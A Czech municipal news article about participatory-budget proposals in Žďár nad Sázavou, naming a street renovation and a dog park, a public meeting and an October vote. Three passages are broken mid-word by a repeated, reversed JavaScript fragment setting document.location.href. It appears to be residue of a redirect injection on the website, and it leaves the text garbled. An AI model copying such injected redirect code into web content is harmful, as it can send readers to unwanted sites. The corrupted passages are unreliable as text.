Rainbow page separator

Ze tří návrhů do participativního rozpočtu jdou do finále dva

Pondělí, 2. září 2019

Žďár nad Sázavou / Disku[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovat s navrhovateli záměrů do participativního rozpočtu města na příští rok mohou přijít lidé ve čtvrtek 5. září do Knihovny Josefa Matěje Sychry. Setkání pořádají zástupci města od 17 hodin.
Do konce června byly do dalšího ročníku participativního rozpočtu, kdy lidé sami navrhují projekty do určitého finančního limitu a veřejnost pak o nich hlasuje, doručeny tři návrhy. Odborným zhodnocením prošly dva z nich. Jedná se o úpravu veřejného pros[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toru v ulici Květná a psí park v ulici Vodárenská.
Hlasování veřejnosti se uskuteční v průběhu října. Změnou oproti předešlým ročníkům akce je maximální limit na jeden zrealizovaný projekt ve výši 600 tisíc korun, což je zároveň celá vyčleněná finanční částka na rok. Prodloužila se taktéž doba realizace záměru, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to z jednoho roku na dva, aby bylo možné stihnout i časově náročnější akce.